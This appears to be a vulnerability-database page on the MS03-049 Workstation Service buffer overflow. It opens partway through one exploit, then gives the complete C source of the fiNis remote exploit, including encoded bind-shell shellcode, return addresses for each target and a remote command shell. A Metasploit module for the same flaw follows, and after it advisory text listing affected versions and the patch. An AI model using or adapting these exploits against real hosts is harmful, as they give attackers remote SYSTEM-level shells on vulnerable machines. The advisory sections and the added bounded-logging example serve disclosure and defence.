		*((long *)ptr)=retaddr;
		ptr+=4;
	}

	if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
		err_exit("-> WSAStartup error....");
	}

	if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
		err_exit("-> socket() error...");
	}
	sockadd.sin_family=AF_INET;
	sockadd.sin_port=htons((SHORT)port);

	ptr=buff+retsize+sc_offset;

	if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");

	banner();

	if (mode) {

		printf("-> 'Listening' mode...( port: %d )\n",port);

		changeport(connback, port, PORT_OFFSET_2);
		for(i=0;i<scsize;i++) { *ptr++=connback[i]; }

		do_send(host,timeout);
		Sleep(1000);

		sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
		i_len=sizeof(sockadd);

		if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
			err_exit("-> bind() error");
		}

		if (listen(s1,0)<0) {
			err_exit("-> listen() error");
		}

		printf("-> Waiting for connection...\n");

		s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);

		if (s2<0) {
			err_exit("-> accept() error");
		}

		printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));

		resetalarm();
		doshell(s2);

	}
	else {

		printf("-> 'Connecting' mode...\n",port);

		changeport(bindport, port, PORT_OFFSET_1);
		for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }

		do_send(host,timeout);
		Sleep(1000);

		printf("-> Will try connecting to shell now....\n");

		i=0;  
		while(!flag) {
			Sleep(interval*1000);
			if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
				printf("-> Trial #%d....\n",i++);
			}
			else { flag=1; }
		}

		printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);

		resetalarm();
		doshell(s1);

	}

	return 0;

}

// milw0rm.com [2003-11-14]

- Vulnerability information (130)

MS Windows XP Workstation Service Remote Exploit (MS03-049) (EDBID:130)
windows remote
2003-12-04 Verified
0 fiNis
N/A
/* To build new netapi32.lib
		pedump /exp netapi32.dll > netapi32.exp
		buildlib netapi32.exe netapi32.exp netapi32.lib netapi32.dll


d:\>rpc_wks_bo.exe

WKS service remote exploit MS03-049 by fiNis (fiNis[at]bk[dot]ru), ver:0.1.1
-------------------------------------------------------------------
Usage: rpc_wks_bo.exe [-ht]
	-h <IP>    : Target IP
	-t <Type>  : Target type (-t0 for a list)

d:\>rpc_wks_bo.exe -t0

Possible targets are:
============================
1) Window XP Pro + SP0 [Rus]
2) Window XP Pro + SP1 [Rus]
3) Crash all

d:\>rpc_wks_bo.exe -h 192.168.100.7 -t1

[+] Prepare exploit string
[+] Sleep at 2s ...
[+] Setting up IPC$ session...
[+] IPC$ session setup successfully!
[+] Sending exploit ...
[+] Initialize WSAStartup - OK
[+] Socket initialized - OK
[+] Try connecting to 192.168.100.7:9191 ...
[*] Connected to shell at 192.168.100.7:9191

Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.

C:\WINDOWS\system32>

*/
/**************** Public version *****************/
#include <stdio.h>
#include <io.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>

#pragma lib <ws2_32.lib>
#pragma lib <netapi32.lib>
#pragma lib <mpr.lib>

#define RECVTIMEOUT		1
#define VER				"0.1.4"

extern char getopt(int,char **,char*);
extern char *optarg;


// ------------------------------------------------
void NetAddAlternateComputerName(wchar_t *Server, wchar_t *AlternateName, wchar_t * DomainAccount,
				wchar_t *DomainAccountPassword, unsigned int Reserved);
void send_exp();
// ----------Lamers buff =) ----------------------------
	char expl[3000];
	wchar_t expl_uni[6000];
	char tgt_net[30];
	wchar_t tgt_net_uni[60];
	char ipc[30];
// -----------------------------------------------------
struct {
	char *os;
	long jmpesp;
}
targets[] = {
	{ "Window XP + SP0 [Rus]            ", 0x77f5801c }, // 0x77d6754a(user32.dll)
	{ "Window XP + SP0 + Rollup [Rus]   ", 0x77f98db7 },  //0x77d639ab-work 0x77fb59cc - sp1
	{ "Window XP + SP1 [Rus]            ", 0x77fb59cc },
	{ "Window XP + SP1 + Rollup [Rus]   ", 0x77f9980f },  // 0x77d637db(user32.dll)
	{ "Crash all                ", 0x41424344 }
}, tgt_type;

unsigned char shellcode[] = // bind shell at 9191 port (484 bytes) // ripped =)
	"\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33"
	"\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C"
	"\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE"
	"\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB"
	"\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77"
	"\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77"
	"\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77"
	"\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77"
	"\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77"
	"\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77"
	"\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77"
	"\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77"
	"\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77"
	"\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB"
	"\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C"
	"\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0"
	"\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77"
	"\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0"
	"\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB"
	"\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5"
	"\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98"
	"\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE"
	"\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77"
	"\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8"
	"\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF"
	"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90"
	"\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74"
	"\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4"
	"\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94"
	"\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5"
	"\xD3\x4A\x8C\x88";


/***************************************************************/
void banner() {
	printf("\nWKS service remote exploit by fiNis (fiNis[at]bk[dot]ru), ver:%s\n",VER);
	printf(  "-------------------------------------------------------------------\n");
}

void showtargets() {
	int i;
	printf("Possible targets are:\n");
	printf("============================\n");
	for (i=0;i<sizeof(targets)/sizeof(tgt_type);i++) {
		printf("%d) %s\n",i+1,targets[i].os);
	}
	exit(1);
}

void usage(char *prog) {
	banner();
	printf("Usage: %s [-ht]\n", prog);
	printf("\t-h <IP>    : Target IP\n");
	printf("\t-t <Type>  : Target type (-t0 for a list)\n");
	exit(1);
}

/***************************************************************/
long gimmeip(char *hostname)
{
	struct hostent *he;
	long ipaddr;

	if ((ipaddr = inet_addr(hostname)) < 0)
	{
		if ((he = gethostbyname(hostname)) == NULL)
		{
			printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
			WSACleanup();
			exit(1);
		}
		memcpy(&ipaddr, he->h_addr, he->h_length);
	}
	return ipaddr;
}

// ************************************* CMD *****************************
/*
 * Ripped from TESO code and modified by ey4s for win32
 */

void cmdshell2(int sock) {
	int l;
	char buf[1000];
	struct timeval time;
	unsigned long ul[2];

	time.tv_sec=RECVTIMEOUT;
	time.tv_usec=0;

	while (1) {
		ul[0]=1;
		ul[1]=sock;

		l=select(0,(fd_set *)&ul,NULL,NULL,&time);
		if(l==1) {
			l=recv(sock,buf,sizeof(buf),0);
			if (l<=0) {
				printf("[x] Connection closed.\n");
				return;
			}
			l=write(1,buf,l);
			if (l<=0) {
				printf("[x] Connection closed.\n");
				return;
			}
		}
		else {
			l=read(0,buf,sizeof(buf));
			if (l<=0) {
				printf("[x] Connection closed.\n");
				return;
			}
			l=send(sock,buf,l,0);
			if (l<=0) {
				printf("[x] Connection closed.\n");
				return;
			}
		}
	}
}

/****************************************************************/
void send_exp() {
	NETRESOURCE _IPC_;

	_IPC_.lpLocalName = NULL;
	_IPC_.lpProvider = NULL;
	_IPC_.dwType = RESOURCETYPE_ANY;
	_IPC_.lpRemoteName = (char*)&ipc;
	printf("[+] Setting up IPC$ session...\n");
	if (WNetAddConnection2(&_IPC_,"","",0)!=ERROR_SUCCESS) {
		printf("[x] Couldn't establish IPC$ connection.\n");
		exit (1);
	}
	printf("[*] IPC$ session setup successfully!\n");
	printf("[+] Sending exploit ...\n");

	NetAddAlternateComputerName(tgt_net_uni, expl_uni ,NULL,NULL,0);
	// ka-a-a b0-0-0-ms //
}

// ***************************************************************
int main(int argc,char *argv[])
{
	WSADATA wsdata;
	int sock;
	unsigned short port = 9191;
	struct sockaddr_in target;
	unsigned long ip;
	char opt;
	int tgt_type = 0;
	char *tgt_host;

	if (argc<2) { usage(argv[0]); }

	while((opt = getopt(argc,argv,"h:t:v"))!=EOF) {
		switch(opt)
		{
			case 'h':
				tgt_host = optarg;
				snprintf(tgt_net,127, "\\\\%s", optarg);
				snprintf(ipc,127, "\\\\%s\\ipc$", optarg);
				break;
			case 't':
				tgt_type = atoi(optarg);
				if (tgt_type == 0 || tgt_type > sizeof(targets) / 8) {
					showtargets();
				}
				break;
			default:
				usage(argv[0]);
				break;
		}
	}

	printf("\n[+] Prepare exploit string\n");

	memset(expl, 0x00, sizeof(expl));
	memset(expl, 0x41, 2064);
	memcpy(&expl[2044], (unsigned char *) &targets[tgt_type-1].jmpesp, 4);
	//memcpy(&expl[2044], "BBBB", 4);
	memcpy(&expl[2064], shellcode, sizeof(shellcode));		// begin shellcode here

	memset(expl_uni, 0x00, sizeof(expl_uni));
	memset(tgt_net_uni, 0x00, sizeof(tgt_net_uni));
	mbstowcs(tgt_net_uni, tgt_net, sizeof(tgt_net));

	switch(tgt_type) {
		case 1:
		case 3:
			MultiByteToWideChar(CP_ACP, 0, expl, sizeof(expl), (unsigned short *)expl_uni, sizeof(expl_uni));
			// MultiByteToWideChar - 100 % work at XP+SP0+Rollup
			break;
		case 2:
			mbstowcs(expl_uni, expl, sizeof(expl)); // work at XP+SP1
			break;
		default:
			mbstowcs(expl_uni, expl, sizeof(expl));
			break;
	}

	beginthread(send_exp,0,NULL);

	printf("[+] Sleep at 2s ... \n");
	sleep(2000);

	if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {
		printf("[x] WSAStartup error...\n");
		WSACleanup();
		return 1;
	}
	printf("[+] Initialize WSAStartup - OK\n");

	if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
		printf("[x] Socket not initialized! Exiting...\n");
		WSACleanup();
		return 1;
	}
	printf("[*] Socket initialized - OK\n");

	ip=gimmeip(tgt_host);
	memset(&target, 0, sizeof(target));
	target.sin_family=AF_INET;
	target.sin_addr.s_addr = ip;
	target.sin_port=htons(port);

	printf("[+] Try connecting to %s:%d ...\n",tgt_host,port);

	if(connect(sock,(struct sockaddr *)&target, sizeof(target))!=0) {
		printf("\n[x] Exploit failed or port is filtered. Exiting...\n");
		WSACleanup();
		exit(1);
	}

	printf("[*] Connected to shell at %s:%d\n\n",inet_ntoa(target.sin_addr),port);
	cmdshell2(sock);
	closesocket(sock);
	WSACleanup();
	return 0;
}



// milw0rm.com [2003-12-04]

- Vulnerability Information (EDB-ID 16378)

Microsoft Workstation Service NetAddAlternateComputerName Overflow (EDBID:16378)
Platform: windows; Type: remote
2010-05-09 Verified
0 metasploit
N/A [Download]
##
# $Id: ms03_049_netapi.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Workstation Service NetAddAlternateComputerName Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName
				function using the Workstation service in Windows XP.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2003-0812' ],
					[ 'OSVDB', '11461' ],
					[ 'BID', '9011' ],
					[ 'MSB', 'MS03-049' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' =>  "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c" + [*(0x80..0x9f)].pack('C*'),
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'DefaultTarget'  => 0,
			'Targets'        =>
				[
					[ 'Windows XP SP0/SP1',
						{
							'Ret' => 0x71aa32ad # pop/pop/ret in ws2help.dll
						}
					],
				],
			'DisclosureDate' => 'Nov 11 2003'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (BROWSER, WKSSVC)", 'BROWSER']),
			], self.class)
	end

	def exploit

		connect()
		smb_login()

		handle = dcerpc_handle(
			'6bffd098-a112-3610-9833-46c3f87e345a', '1.0',
			'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
		)

		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		print_status("Building the stub data...")


		name = rand_text_alphanumeric(5000)
		name[3496, 4] = [target.ret].pack('V')
		name[3492, 2] = "\xeb\x06"
		name[3500, 5] = "\xe9" + [-3505].pack('V')
		name[0, payload.encoded.length] = payload.encoded

		stub =
			NDR.long(rand(0xffffffff)) +
			NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") +
			NDR.long(rand(0xffffffff)) +
			NDR.UnicodeConformantVaryingString(name) +
			NDR.long(rand(0xffffffff)) +
			NDR.UnicodeConformantVaryingString('') +
			NDR.long(0) +
			NDR.long(0)

		print_status("Calling the vulnerable function...")

		begin
			dcerpc.call(0x1b, stub)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end
		

- Vulnerability Information (PacketStorm F83213)

Microsoft Workstation Service NetAddAlternateComputerName Overflow (PacketStormID:F83213)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows,xp
CVE-2003-0812
[Download]

This Metasploit module exploits a stack overflow in the NetApi32 NetAddAlternateComputerName function using the Workstation service in Windows XP. It is the same module as the Exploit-DB entry above.


- Vulnerability Information (OSVDB 11461)

OSVDB ID: 11461
Title: Microsoft Windows Workstation Service WKSSVC.DLL Logging Function Remote Overflow
Location / Attack type: Remote / Network Access, Input Manipulation
Impact: Loss of Integrity
Exploit status: Exploit Public, Exploit Commercial, Vendor Verified

- Vulnerability Description

A remote overflow exists in the Windows Workstation Service of Microsoft Windows. 'WKSSVC.DLL' fails to perform proper bounds checking on data it writes to its log, resulting in a stack-based buffer overflow. With a specially crafted request, a remote attacker can execute arbitrary code with SYSTEM privileges, resulting in a loss of integrity.
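The bug class described above, as an added example that is not code from this page, from WKSSVC.DLL or from any of the exploits on it: a log routine that formats a caller-supplied name into a fixed stack buffer with vsprintf, beside a bounded replacement that reports truncation instead of overrunning the frame, and the pre-check the original routine lacked. LOG_BUF_SIZE (256 bytes), the message text, the 5000-byte name and the helper names (log_unsafe, log_safe, would_overflow, long_name, demo) are assumptions chosen for the demonstration, not values from the service.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the page or from WKSSVC.DLL. The buffer size
 * and message text are assumptions standing in for the service's log line. */
#define LOG_BUF_SIZE 256

typedef struct {
    int needed;      /* bytes the full message needs, excluding the NUL */
    int written;     /* bytes actually stored, excluding the NUL */
    int truncated;   /* 1 if the message did not fit */
} log_result;

/* The vulnerable shape: vsprintf is told nothing about sizeof line, so a long
 * %s argument keeps writing past the end of the stack frame. It is only safe
 * when every argument is already known to be short, which a remote RPC caller
 * never guarantees. Called below with a short name only. */
static int log_unsafe(const char *fmt, ...)
{
    char line[LOG_BUF_SIZE];
    va_list ap;
    va_start(ap, fmt);
    int n = vsprintf(line, fmt, ap);   /* BUG: no length bound */
    va_end(ap);
    return n;
}

/* The bounded replacement: vsnprintf stops at outsz-1 bytes, always
 * NUL-terminates, and returns the length the full message would have had,
 * so truncation is reported instead of silently corrupting the stack. */
static log_result log_safe(char *out, size_t outsz, const char *fmt, ...)
{
    log_result r = { 0, 0, 0 };
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    if (n < 0) {                       /* encoding error: leave an empty line */
        out[0] = '\0';
        return r;
    }
    r.needed = n;
    r.truncated = (size_t)n >= outsz;
    r.written = r.truncated ? (int)outsz - 1 : n;
    return r;
}

/* The check the original routine lacked: size the message before formatting
 * into a fixed buffer. Returns 1 if it would not fit. */
static int would_overflow(size_t bufsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(NULL, 0, fmt, ap);
    va_end(ap);
    return n < 0 || (size_t)n >= bufsz;
}

/* Constructed input: 5000 x 'A', the name length the modules on this page send. */
static const char *long_name(void)
{
    static char name[5001];
    memset(name, 'A', 5000);
    name[5000] = '\0';
    return name;
}

/* Returns 1 when the bounded logger behaves as intended on both inputs. */
static int demo(void)
{
    char buf[LOG_BUF_SIZE];
    const char *fmt = "NetpValidateName: '%s' is not valid\n";
    log_result ok  = log_safe(buf, sizeof buf, fmt, "WKS01");
    log_result big = log_safe(buf, sizeof buf, fmt, long_name());
    return ok.needed == 39 && !ok.truncated
        && big.needed == 5034 && big.truncated && big.written == LOG_BUF_SIZE - 1
        && strlen(buf) == LOG_BUF_SIZE - 1
        && !would_overflow(sizeof buf, fmt, "WKS01")
        && would_overflow(sizeof buf, fmt, long_name())
        && log_unsafe(fmt, "WKS01") == 39;
}

int main(void)
{
    printf("bounded logger behaves correctly: %s\n", demo() ? "yes" : "no");
    return 0;
}
```

The fix is not only the length argument: a logger that truncates must also make the truncation visible (here via the needed and truncated fields), otherwise an attacker-controlled name can still push the meaningful part of a log line out of view.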

- Timeline

2003-11-11 2003-09-15
2003-11-11 2003-11-11

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- Vulnerability Information (BID 9011)

Microsoft Windows Workstation Service Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error; Bugtraq ID: 9011
Remote: Yes; Local: No
Published: 2003-11-11 12:00:00; Updated: 2009-07-12 12:56:00
Vulnerability discovery credited to eEye Digital Security. Core Security Technologies has been credited with providing the updated information about the new attack vector of sending a single UDP packet to a broadcast address to exploit all vulnerable syst

- Affected Versions

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Cisco Voice Manager
Cisco User Registration Tool
Cisco uOne Enterprise Edition
Cisco Unity Server 4.0
Cisco Unity Server 3.3
Cisco Unity Server 3.2
Cisco Unity Server 3.1
Cisco Unity Server 3.0
Cisco Unity Server 2.46
Cisco Unity Server 2.4
Cisco Unity Server 2.3
Cisco Unity Server 2.2
Cisco Unity Server 2.1
Cisco Unity Server 2.0
Cisco Unity Server
Cisco Transport Manager
Cisco Trailhead
Cisco SN 5428 Storage Router SN5428-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-3.3.1-K9
Cisco SN 5428 Storage Router SN5428-3.2.2-K9
Cisco SN 5428 Storage Router SN5428-3.2.1-K9
Cisco SN 5428 Storage Router SN5428-2.5.1-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.1-K9
Cisco SN 5420 Storage Router 1.1.3
Cisco SN 5420 Storage Router 1.1 (7)
Cisco SN 5420 Storage Router 1.1 (5)
Cisco SN 5420 Storage Router 1.1 (4)
Cisco SN 5420 Storage Router 1.1 (3)
Cisco SN 5420 Storage Router 1.1 (2)
Cisco Small Network Management Solution
Cisco Service Management
Cisco Secure Scanner
Cisco Secure Policy Manager 3.0.1
Cisco Secure Access Control Server 3.2.2
Cisco Secure Access Control Server 3.2.1
Cisco Secure Access Control Server 3.2 (1.20)
Cisco Secure Access Control Server
Cisco Routed Wan Management
Cisco QoS Policy Manager
Cisco Personal Assistant 1.4 (2)
Cisco Personal Assistant 1.4 (1)
Cisco Personal Assistant 1.3 (4)
Cisco Personal Assistant 1.3 (3)
Cisco Personal Assistant 1.3 (2)
Cisco Personal Assistant 1.3 (1)
Cisco Personal Assistant
Cisco Networking Services for Active Directory
Cisco Network Registar
Cisco Media Blender
Cisco Lan Management Solution
Cisco IP/VC 3540 Video Rate Matching Module
Cisco IP/VC 3540 Application Server
Cisco IP/TV Server
Cisco IP Telephony Environment Monitor
Cisco IP Call Center Express (IPCC Express) Standard 3.0
Cisco IP Call Center Express (IPCC Express) Enhanced 3.0
Cisco Internet Service Node
Cisco Intelligent Contact Manager 5.0
Cisco Intelligent Contact Manager
Cisco E-Mail Manager
Cisco Dynamic Content Adapter
Cisco DOCSIS CPE Configurator
Cisco Customer Response Application Server
Cisco Conference Connection 1.2
Cisco Conference Connection 1.1 (1)
Cisco Conference Connection
Cisco Collaboration Server
Cisco CiscoWorks VPN/Security Management Solution
Cisco Call Manager 4.0
Cisco Call Manager 3.3 (3)
Cisco Call Manager 3.3
Cisco Call Manager 3.2
+ Cisco VoIP Phone 7902G 0
+ Cisco VoIP Phone 7905G 0
+ Cisco VoIP Phone 7912G 0
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0
Cisco Call Manager 2.0
Cisco Call Manager 1.0
Cisco Call Manager
Cisco Building BroadBand Service Manager Hotspot 1.0
Cisco Building Broadband Service Manager (BBSM) 5.1
Cisco Building Broadband Service Manager (BBSM) 5.0
Cisco Building Broadband Service Manager (BBSM) 4.5
Cisco Building Broadband Service Manager (BBSM) 4.4
Cisco Building Broadband Service Manager (BBSM) 4.3
Cisco Building Broadband Service Manager (BBSM) 4.2
Cisco Building Broadband Service Manager (BBSM) 4.0.1
Cisco Building Broadband Service Manager (BBSM) 3.0
Cisco Building Broadband Service Manager (BBSM) 2.5.1
Cisco Broadband Troubleshooter

- Unaffected Versions

Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows ME

- Vulnerability Discussion

The Microsoft Windows Workstation service (WKSSVC.DLL) is prone to a vulnerability that may allow a remote attacker to gain unauthorized access to a vulnerable host. The problem lies in the service's handling of remote requests: it does not properly bounds-check remotely supplied data, making it possible to overwrite sensitive regions of process memory.

- Exploitation

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Various exploits have been published, some of which are designed to target systems using NTFS filesystems and others which only affect those using FAT. The primary difference is that the exploits designed for NTFS use an undocumented Windows XP API call to log to the debug directory, which would not normally be writeable by all users.

The following exploits are designed to affect systems using FAT filesystems only:
MS03-049ex.c
o_wks.c
11.14.MS03-049-II.c

The following exploits are designed to affect systems using NTFS and FAT:
12.04.rpc_wks_bo.c
0349.cpp

An exploit that is reported to be universal for all versions of Windows XP and to work on both NTFS and FAT file systems is also available (WorkstationExploit.c).

- Solution

Microsoft has released security bulletin MS03-049 to address this issue. Users are strongly advised to obtain fixes, as the new attack vectors greatly increase the speed of an attack on a targeted network.

Cisco has released a security advisory detailing affected Cisco products. See referenced advisory for details concerning obtaining fixes.


Fixes are available for the following products:
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Advanced Server SP2
Cisco Internet Service Node
Microsoft Windows XP Professional
Cisco Conference Connection
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows 2000 Advanced Server SP4
Cisco Personal Assistant
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows XP Home
Cisco Building BroadBand Service Manager Hotspot 1.0
Cisco Call Manager 1.0
Cisco Conference Connection 1.1 (1)
Cisco Conference Connection 1.2
Cisco Personal Assistant 1.3 (4)
Cisco Personal Assistant 1.3 (1)
Cisco Personal Assistant 1.4 (2)
Cisco Personal Assistant 1.4 (1)
Cisco Call Manager 2.0
Cisco IP Call Center Express (IPCC Express) Enhanced 3.0
Cisco IP Call Center Express (IPCC Express) Standard 3.0
Cisco Building Broadband Service Manager (BBSM) 3.0
Cisco Call Manager 3.0
Cisco Call Manager 3.1
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.2
Cisco Call Manager 3.3 (3)
Cisco Building Broadband Service Manager (BBSM) 4.0.1
Cisco Building Broadband Service Manager (BBSM) 4.2
Cisco Building Broadband Service Manager (BBSM) 4.4
Cisco Building Broadband Service Manager (BBSM) 4.5
